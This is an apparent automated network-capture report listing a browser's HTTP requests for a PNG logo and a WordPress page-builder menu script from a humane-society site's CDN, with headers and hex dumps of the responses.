                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 15508
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2024/11/317_logo_proposed_simpler_inverse-768x161.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 07 Nov 2024 16:13:54 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC744INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 00 00 00 00 a1 08 06 00 00 00 70 29 d8 58 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 20 00 49 44 41 54 78 9c ed dd 7f 98 5c 55 99 e0 f1 ef b9 5d a9 ae 34 4d db 84 26 74 62 a7 e9 84 18 33 31 9b c9 62 cc 46 cc 64 30 03 98 41 06 49 e4 57 03 2a e8 30 8a 8c e3 b0 e8 e3 ba 3c 2c eb c3 b2 3e ac eb 22 c3 28 2a 3a 2a fe a8 10 91 20 22 2a 22 83 c8 20 83 88 59 8c 99 98 8d 49 6f d2 76 62 6f 88 6d a7 69 3a 95 ea 3a fb c7 7b cb 74 92 fa 75 ab ce ad ba b7 fa fd 3c 4f 3f 44 bb ea d6 a9 ea 5b f7 9e f7 9c f7 bc 07 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 a5 94 52 4a 29 15 07 a6 d1 0d 70 2a bd cf a3 c5 5e 80 99 dc c9 a5 f3 b6 37 ba 39 4a 29 a5 94 52 4a 45 8d d7
                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRp)XpHYs+ IDATx\U]4M&tb31bFd0AIW*0<,>"(*:* "*" YIovbomi::{tu<O?D[RJ)RJ)RJ)RJ)RJ)RJ)p*^79J)RJE
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: c3 23 4f 60 ed 79 f4 cf 7b da e1 31 95 52 4a 29 a5 94 8a b4 e8 cf 00 18 9b c2 98 4b 00 d7 3b f9 26 31 e6 46 d2 83 b3 1c 1f 57 29 a5 94 52 4a a9 c8 8a 7e 00 80 9d eb e7 fe b7 3b 3e b0 07 ac c1 b0 81 cd bb 13 8e 8f ad 94 52 4a 29 a5 54 24 45 3f 00 30 5c 0b 2c 0c e9 e8 b3 80 4b 99 48 84 75 7c a5 94 52 4a 29 a5 22 25 da 01 40 7a f0 1c ac fd 9b 10 5f c1 03 ce c6 98 b5 7c 6b 40 67 01 94 52 4a 29 a5 54 d3 8b 6e 00 b0 69 a8 03 c3 8d 40 57 c8 af d4 0e bc 83 4c 62 b1 2c 38 56 4a 29 a5 94 52 aa 79 45 33 00 48 ef 4b 60 ed 45 c0 0a ea d3 c6 55 18 73 39 5e ce 45 89 51 a5 94 52 4a 29 a5 22 2b 9a 01 80 c9 2d c4 da 7e 6a df f4 2b 00 fb 6e 72 b9 c5 f5 7b 3d a5 94 52 4a 29 a5 ea 2f 7a 01 40 7a 5f 02 58 03 9c 03 d4 33 2f 7f 2e c6 bc b7 8e af a7 94 52 4a 29 a5 54 dd 45 2b 00
                                                                                                                                                                                                                                                        Data Ascii: #O`y{1RJ)K;&1FW)RJ~;>RJ)T$E?0\,KHu|RJ)"%@z_|k@gRJ)Tni@WLb,8VJ)RyE3HK`EUs9^EQRJ)"+-~j+nr{=RJ)/z@z_X3/.RJ)TE+
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: db ed 5f 47 94 aa 44 02 19 51 0e 5c 16 dc 3f cf de 44 b4 46 6f a3 6c ea f7 f6 1c 64 16 eb 7b d6 da 77 fb 03 7f 2a 7a da 80 1e 60 25 70 19 70 27 f0 23 6b ed 3b fd d4 c9 40 1a 70 61 36 8b c1 7e 00 79 13 71 d2 29 9b 83 cd 98 16 17 17 bf 23 d4 87 8c fe 07 f9 5b ed 04 ee 70 9d ab d6 0c fc 9c dd 0b 91 a9 c8 4b 88 de cc 47 53 f0 03 cf 87 80 67 03 3c 2d 89 a4 d7 f4 85 d1 a6 69 a6 0d 19 0d ff 7b e0 9f 81 b3 ab b9 39 a9 69 6b 01 b0 ac 8a 73 66 29 32 1b e2 6a 4d c4 74 d3 86 a4 93 7d 11 b8 dd 4f 51 55 d1 95 40 66 85 97 23 69 83 ff c9 5a 1b 68 e6 ab be 01 40 7a 30 85 35 e7 23 d1 4b 1c 9d 8b e1 dc 46 37 a2 4e 12 48 84 b9 36 e0 f3 be 6e 8c d9 15 42 7b 62 cd 5a db 09 5c 81 7c 51 57 35 b8 39 d3 c1 7e 64 14 ba ec 62 ca 29 e6 02 37 e8 e8 97 53 8b 90 d9 ae b5 7e 00 ac 54 39
                                                                                                                                                                                                                                                        Data Ascii: _GDQ\?DFold{w*z`%pp'#k;@pa6~yq)#[pKGSg<-i{9iksf)2jMt}OQU@f#iZh@z05#KF7NH6nB{bZ\|QW59~db)7S~T9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 35 1f 02 9e a6 f2 8e 7b 8e a3 5f e2 2c 12 39 df 82 9b f2 b2 59 e0 51 64 b7 5e 9d d1 68 3e 13 c0 cf aa 78 5e 17 b0 8c e6 0b 00 4e 60 8c c9 21 33 03 e3 48 70 3d 64 ad dd 02 bc 08 7c 09 38 cb d1 4b 25 91 cf 55 03 00 55 89 d9 c0 1b fc 99 b8 a9 9d c3 55 04 2f 58 d1 f4 8c 31 13 d6 da c7 81 bf 40 ae 5d b5 04 48 e3 04 db 48 b1 56 0f 02 9f 0b e9 35 87 89 c0 6c 86 3f f3 39 e6 ff 0c 03 bb ac b5 cf fa ff fb 16 ea 58 75 29 9c 00 20 3d d8 8e e1 96 d0 8e 1f 3d bd 18 f3 2e be b9 67 0b 97 f6 c6 35 17 7e 35 15 4c 19 1d 27 0b fc a4 da 17 34 c6 1c 24 60 27 c0 1f a5 9c 05 5c 01 dc ea ff bb 96 91 ff 1c 30 80 5c 74 3e 0f 8c e8 5e 06 35 c9 f9 3f f9 a9 e3 fc 88 b2 4b d5 8c 10 65 91 4e fc 30 c1 2a 86 74 01 6f b2 d6 3e ec 77 90 a7 15 63 4c ce 5a fb 22 70 37 f2 1d 71 f5 b7 9c 2e f7
                                                                                                                                                                                                                                                        Data Ascii: 5{_,9YQd^h>x^N`!3Hp=d|8K%UUU/X1@]HHV5l?9Xu) ==.g5~5L'4$`'\0\t>^5?KeN0*to>wcLZ"p7q.
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 17 6e 02 d9 3a 7d 17 b0 3d c4 a0 60 23 52 56 74 5a 2d 78 b4 d6 2e c5 5d 25 03 90 d1 ff ef 38 5a 6f 32 4e f0 00 00 e0 24 e4 7a 39 6d 02 00 7f 21 e1 6a e0 83 b8 5d cb f1 6f 0e 8f a5 e2 67 36 70 3f d5 7d 97 16 21 41 7c d0 5a e9 7b 90 b4 b3 e9 be 96 a7 98 0c 92 32 92 46 02 80 50 d3 7b a7 09 0f e8 b3 d6 1e df 4f ca ef d8 9c 5f d8 fe 26 a4 18 88 8b f5 8d 20 fb 2b 3d 5f c9 6c b5 9b 00 c0 e0 21 79 d5 71 cb ad 0b 4b 3b 70 39 e9 bd df a7 7f 5e 1c be 48 d5 ce da fc ce 55 03 fc ce c6 45 c0 cd 48 67 c3 d5 68 e3 12 8e 56 8f c8 1f 33 8b 74 02 c7 80 01 6b ed 97 80 47 8d 31 4e ab bc 18 63 e2 32 03 e4 da 06 dc dd 68 73 c8 0e be 4f 38 3a 5e 86 ea 2a d0 b4 d3 5c b5 eb 13 c0 2c 6b ed f1 8b ce 92 1c dd 01 f8 3c 24 4d a3 1b b7 7b 39 3c e5 f0 58 2a 7e 3a 90 ce f8 56 82 a7 09 be
                                                                                                                                                                                                                                                        Data Ascii: n:}=`#RVtZ-x.]%8Zo2N$z9m!j]og6p?}!A|Z{2FP{O_& +=_l!yqK;p9^HUEHghV3tkG1Nc2hsO8:^*\,k<$M{9<X*~:V
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: b5 07 a9 ef fa a3 51 ff f5 6a 5d 13 97 44 d6 69 fc ca 5a fb 80 cb 6a 4d d5 05 00 e9 bd 09 f2 0b 5c 63 a2 d5 33 fc d5 dc 14 6b 4e 3b f6 1a 70 5a ab 47 7f ef 4c 7e f4 bb c3 ec 1c 0b 6d a6 ab 0f 63 ae 44 b6 a1 8e 1c 63 cc a8 b5 76 88 e0 bb 0d ce b6 d6 a6 8c 31 35 6f 08 e6 77 f8 03 6d f4 e4 8f 4a ec b0 d6 7e 0a b9 79 7c 14 77 53 c9 5d c8 7a 00 0d 00 ca f3 80 7e 87 c7 db 86 e3 d1 7f 5f 07 d5 a5 ad 1d 24 e0 b9 a9 fe e8 fb c0 cd c6 98 9d 8d 6e 88 8a 8c fc 22 60 90 e0 fa 17 48 67 c9 55 f1 80 bc 21 60 ab 31 26 e3 0f 16 45 7d 2d 5e 31 23 01 bf 3f 4f 5b 6b 1f 42 76 a2 bf 85 ea 67 ea 13 c0 0a e4 3e 58 af 00 e0 71 a4 f0 43 18 83 05 83 d4 b7 90 c3 30 92 ba f3 37 0e 8e 35 17 c9 f5 df 81 c3 6c 92 ea 02 00 63 da 91 9a ed b1 59 50 f3 9a 93 5b f8 9b 33 4f 22 e9 9d 38 8d bf
                                                                                                                                                                                                                                                        Data Ascii: Qj]DiZjM\c3kN;pZGL~mcDcv15owmJ~y|wS]z~_$n"`HgU!`1&E}-^1#?O[kBvg>XqC075lcYP[3O"8
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 15 f9 5e 64 91 fb 47 2f f0 36 e4 3a ed 72 f4 ff 20 0d dc eb c2 5f 0c fc 55 e4 7d d7 7a 1d cf 10 ee b5 a4 de 12 fe 80 59 39 f9 fb 63 07 32 23 7e 03 32 e8 58 ab 0c f5 9b 19 ba 18 58 e2 6f 42 e6 da 57 80 87 eb 98 ad 90 ff 7b 80 ec 6a ff 30 f0 3e dc f4 53 92 c8 67 b5 d3 5a fb 89 6a 07 ce 2a 0f 00 d2 83 6d 18 de 8e 9b 13 2a 74 27 25 0c 97 f6 cc 64 f5 69 49 82 5c d2 ce 6c 4f f0 ce be 36 7e f1 fb 23 0c bd 12 ca 82 e0 25 d8 dc 0a 32 2d db 69 dc 74 eb 09 fc 8d 52 76 20 6b 01 d6 06 78 6a 37 f0 66 6b ed c3 01 3b 4a 49 24 27 7b 09 52 45 06 e4 26 37 88 04 02 03 c0 3e 24 d7 36 7f 72 27 90 80 63 1e 52 b1 e8 1c c2 9b 8d 1a 63 1a 2f 20 ab 40 37 f0 17 b8 e9 84 8c 21 17 e7 30 3f ef 75 04 6f eb 28 70 5f 08 6d 51 cd 67 2b b2 17 86 ab 41 88 14 72 7d 3b c7 d1 f1 ca 19 42 ce f7
                                                                                                                                                                                                                                                        Data Ascii: ^dG/6:r _U}zY9c2#~2XXoBW{j0>SgZj*m*t'%diI\lO6~#%2-itRv kxj7fk;JI$'{RE&7>$6r'cRc/ @7!0?uo(p_mQg+Ar};B
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 93 d9 29 b7 3d f5 99 2d 86 bf 9c 93 62 c5 29 a1 54 3f 5d 00 66 35 e9 bd 51 4c 9b 19 07 3e 87 5c 88 2b 95 00 6e b4 d6 c6 22 60 9c 22 87 74 fa 6f 03 1e d1 ce 5f 51 4b 71 b3 b3 64 16 59 63 11 5a ae ae 3f fa 7f 39 c1 d2 7f 86 81 7b b4 f4 a7 aa 96 df 99 fe 02 70 2b 72 3e 45 d1 04 b0 11 f8 40 14 47 77 fd 19 e8 1f 13 2c 88 da 49 f0 b4 55 55 d8 38 b2 ff c9 ed 5a 08 23 3c 7e 3f e3 0e 64 b0 d5 a5 14 f0 21 e0 82 72 a9 40 65 6e e4 66 25 31 28 ef 98 f4 0c 17 cc 69 e5 9c d9 ad 81 36 fd aa d4 bf eb 4c f0 d6 b9 ad b4 bb 5f 0c 90 04 5e 4f b0 4e 4a 5d f8 0b b2 b6 03 9f 26 58 2a d0 22 e0 ca 4a 73 d0 22 20 8b 8c 46 df 04 7c a1 49 77 7d ad 99 b5 36 5f fa d3 45 fa cf f3 c0 f7 c3 5a 58 e6 8f 7c 2c 07 36 50 79 b0 92 45 3a ff 71 ad e4 a2 22 c2 18 93 31 c6 7c 1e b8 11 39 d7 a3 32
                                                                                                                                                                                                                                                        Data Ascii: )=-b)T?]f5QL>\+n"`"to_QKqdYcZ?9{p+r>E@Gw,IUU8Z#<~?d!r@enf%1(i6L_^ONJ]&X*"Js" F|Iw}6_EZX|,6PyE:q"1|92
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 52 4a 29 a5 54 fc 9d d8 c9 f7 bc 24 f0 a7 f5 6f 4a e5 ce 6c 6f e1 fc ee 20 15 29 dd 3b fb d4 24 7f d6 95 64 86 bb 69 00 0f 72 cb 5d 1d 4c 29 a5 94 52 4a a9 42 4e 0c 00 a4 1e 69 5f dd 5b 52 21 cf c0 95 67 b4 71 c6 49 8d 19 fd cf eb 4c 7a 9c 7b 7a 2b 27 bb db 7d d8 c3 98 9e f2 0f 53 4a 29 a5 94 52 aa 7a 85 d2 7c 12 54 b6 e3 6b 43 74 24 3c fa cf 98 d9 e8 66 00 b0 6e 4e 8a 79 6d ce 32 a5 3c 64 f3 2b a5 94 52 4a 29 a5 42 53 20 05 c8 76 21 1b 2c 45 d2 a5 bd 33 39 bd b5 b1 a3 ff 79 5d ad 1e d7 ce 3f c9 d5 e1 3c 60 01 9b 77 47 76 ed 85 52 4a 29 a5 94 8a bf 13 3b 9b 39 33 b7 01 ed a8 48 aa c5 70 65 6f 34 46 ff f3 d6 cd 49 31 c3 5d 97 bd 83 6c 22 8c ad a0 95 52 4a 29 a5 94 02 0a a6 00 d9 c8 8e fe bf ae 23 c1 99 ed 4e 2b ef d4 6c c1 49 2d bc fe 14 67 7b 02 24 c8 79
                                                                                                                                                                                                                                                        Data Ascii: RJ)T$oJlo );$dir]L)RJBNi_[R!gqILz{z+'}SJ)Rz|TkCt$<fnNym2<d+RJ)BS v!,E39y]?<`wGvRJ);93Hpeo4FI1]l"RJ)#N+lI-g{$y
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 06 cc 2b f1 fb ed c8 df 35 ff 79 b5 23 7f c7 5d c0 73 fe ff d7 41 fc 3f 87 42 72 c0 33 c0 a7 90 bf 75 1b 70 16 c5 d7 49 8c 13 ed ce 3f 48 27 fe ba e3 fe bf 76 e0 22 64 21 78 a1 eb d3 28 f0 00 12 08 bf 10 6a eb 82 19 06 9e 3a ee ff cb cf d8 8c 23 0b fc bb 4b 3c ff 00 75 ae dc 54 e8 c3 cd 82 d9 ce b1 65 b5 1a ee 37 63 59 76 bd 9c e5 0d b3 92 91 2a 07 6a 81 ad 7f c8 32 38 5e f3 4c 54 0e 8f 6d 0e 9a a4 94 52 fb 81 3b 39 71 51 68 7e b4 f9 5a 24 00 28 66 07 d2 d9 88 b3 83 c4 63 84 70 8c a3 b3 11 85 ee c9 73 a7 fc bb a3 c8 63 72 c8 7b 1d 70 dc b6 7a 4b 52 7a 76 e3 09 a4 73 7f 25 f0 26 a4 e2 0d 48 a7 f0 97 c0 f7 29 3f f3 13 57 39 8e dd b7 e2 34 8a 8f fe 1f 44 82 e0 a8 7f 0e 19 8e ed f4 ce 05 3e 8c fc 7d 0b cd 02 0d 20 d7 b5 8d 48 87 3b 4a 9e 45 16 e2 1f 2f 83 bc
                                                                                                                                                                                                                                                        Data Ascii: +5y#]sA?Br3upI?H'v"d!x(j:#K<uTe7cYv*j28^LTmR;9qQh~Z$(fcpscr{pzKRzvs%&H)?W94D>} H;JE/


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        80192.168.2.449841192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC447OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC665INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 15448
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC704INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 37 34 32 30 38 3a 65 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2e 6d 65 6e 75 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 6d 65 6e 75 22 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 6d 65 6e 75 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6f 3d 65 3d 3e 5b 22 61 75 74 6f 22 2c 22 73 63 72 6f 6c 6c 22 2c 22 68 69 64 64 65 6e 22 5d 2e 69 6e 63 6c 75 64 65 73 28 65 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 29 29 3b 6c 65 74 20 69 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 74 28 65
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var e={74208:e=>{void 0===TCB_Front.js_modules.menu&&TCB_Front.setModuleLoadedStatus("menu",!1),function(t,n){if(TCB_Front.isModuleLoaded("menu"))return;const o=e=>["auto","scroll","hidden"].includes(e.css("overflow"));let i;function s(e){return t(e
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 28 6f 29 3b 73 7c 7c 6e 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 64 69 73 70 6c 61 79 22 2c 22 6e 6f 6e 65 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 69 2e 74 6f 67 67 6c 65 28 73 29 7d 29 29 7d 2c 68 61 73 56 69 73 69 62 6c 65 49 74 65 6d 73 28 65 29 7b 6c 65 74 20 74 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 66 69 6e 64 28 22 3e 20 6c 69 22 29 2e 65 61 63 68 28 28 28 65 2c 6e 29 3d 3e 7b 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 6e 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 64 69 73 70 6c 61 79 22 29 2e 69 6e 63 6c 75 64 65 73 28 22 6e 6f 6e 65 22 29 7c 7c 28 74 3d 21 30 29 7d 29 29 2c 74 7d 2c 7a 49 6e 64 65 78 4f 72 64 65 72 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 22 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 22
                                                                                                                                                                                                                                                        Data Ascii: (o);s||n.style.setProperty("display","none","important"),i.toggle(s)}))},hasVisibleItems(e){let t=!1;return e.find("> li").each(((e,n)=>{getComputedStyle(n).getPropertyValue("display").includes("none")||(t=!0)})),t},zIndexOrder(){const e=t("ul.tve_w_menu"
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 6b 65 64 22 29 2e 6f 6e 28 22 6d 65 6e 75 5f 69 74 65 6d 5f 61 6e 63 68 6f 72 5f 63 6c 69 63 6b 65 64 22 2c 22 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29 3b 61 2e 69 73 48 61 6d 62 75 72 67 65 72 28 65 29 26 26 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 28 29 3d 3e 7b 61 2e 74 6f 67 67 6c 65 53 74 61 74 65 28 65 2c 21 31 29 7d 29 29 7d 29 29 2c 65 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 6d 65 6e 75 5f 69 74 65 6d 5f 63 6c 69 63 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 6d 65 6e 75 5f 69 74 65 6d 5f 63 6c 69 63 6b 22 2c 22 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 3a 6e 6f 74 28 2e 74 76 65 2d 72 65 67 75 6c 61 72 20 2e 74 63 62 2d 6d 65 67 61 2d 64
                                                                                                                                                                                                                                                        Data Ascii: ked").on("menu_item_anchor_clicked",".tve_w_menu li",(function(){const e=t(this);a.isHamburger(e)&&requestAnimationFrame((()=>{a.toggleState(e,!1)}))})),e.off("click.menu_item_click").on("click.menu_item_click",".tve_w_menu li:not(.tve-regular .tcb-mega-d
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 75 72 6e 21 31 7d 69 66 28 63 26 26 64 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6d 3d 6e 2e 63 68 69 6c 64 72 65 6e 28 22 2e 74 76 65 5f 65 74 5f 63 6c 69 63 6b 22 29 3b 72 65 74 75 72 6e 20 6d 2e 6c 65 6e 67 74 68 3e 30 3f 28 6d 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 21 30 29 3a 21 21 72 2e 61 74 74 72 28 22 68 72 65 66 22 29 26 26 28 72 2e 68 61 73 43 6c 61 73 73 28 22 74 76 65 2d 6a 75 6d 70 2d 73 63 72 6f 6c 6c 22 29 3f 28 72 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 21 30 29 3a 28 73 28 72 2c 65 29 2c 76 6f 69 64 28 61 2e 69 73 48 61 6d 62 75 72 67 65 72 28 6e 29 26 26 6c 2e 70 61 74 68 6e 61 6d 65 3d 3d 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 26 26 6c 2e 68 6f 73 74 3d 3d 3d 77 69
                                                                                                                                                                                                                                                        Data Ascii: urn!1}if(c&&d)return!1;const m=n.children(".tve_et_click");return m.length>0?(m.trigger("click"),!0):!!r.attr("href")&&(r.hasClass("tve-jump-scroll")?(r.trigger("click"),!0):(s(r,e),void(a.isHamburger(n)&&l.pathname===window.location.pathname&&l.host===wi
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 65 73 70 6f 6e 73 69 76 65 54 6f 67 67 6c 65 28 29 7b 22 6d 6f 62 69 6c 65 22 3d 3d 3d 6e 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 29 3f 28 6e 2e 24 62 6f 64 79 2e 66 69 6e 64 28 22 2e 76 6d 64 2d 72 69 67 68 74 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 74 6f 67 67 6c 65 2d 64 69 72 22 2c 22 76 6d 64 2d 72 69 67 68 74 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 76 6d 64 2d 72 69 67 68 74 22 29 2e 61 64 64 43 6c 61 73 73 28 22 76 6d 64 2d 74 6f 67 67 6c 65 22 29 2c 6e 2e 24 62 6f 64 79 2e 66 69 6e 64 28 22 2e 76 6d 64 2d 6c 65 66 74 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 74 6f 67 67 6c 65 2d 64 69 72 22 2c 22 76 6d 64 2d 6c 65 66 74 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 76 6d 64 2d 6c 65 66 74 22 29 2e 61 64 64 43 6c 61 73 73 28 22
                                                                                                                                                                                                                                                        Data Ascii: esponsiveToggle(){"mobile"===n.getDisplayType()?(n.$body.find(".vmd-right").attr("data-toggle-dir","vmd-right").removeClass("vmd-right").addClass("vmd-toggle"),n.$body.find(".vmd-left").attr("data-toggle-dir","vmd-left").removeClass("vmd-left").addClass("
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 29 2c 74 28 22 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 22 3e 20 75 6c 22 29 3b 69 66 28 21 65 2e 64 61 74 61 28 22 74 76 65 2d 63 6f 6c 6f 72 73 2d 61 64 64 65 64 22 29 26 26 65 2e 66 69 6e 64 28 22 3e 20 6c 69 20 3e 20 61 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 2d 63 6f 6c 6f 72 22 29 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 66 69 6e 64 28 22 3e 20 6c 69 20 3e 20 61 22 29 2c 6e 3d 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 2d 63 6f 6c 6f 72 22 29 3b 74 2e 61 74 74 72 28 22 64 61 74 61 2d 74 76 65 2d 63 75 73 74 6f 6d 2d 63
                                                                                                                                                                                                                                                        Data Ascii: removeClass("tve-m-expanded"),t(".tve-m-trigger").each((function(){const e=t(this).parent().find("> ul");if(!e.data("tve-colors-added")&&e.find("> li > a").attr("data-o-color")){const t=e.find("> li > a"),n=t.attr("data-o-color");t.attr("data-tve-custom-c
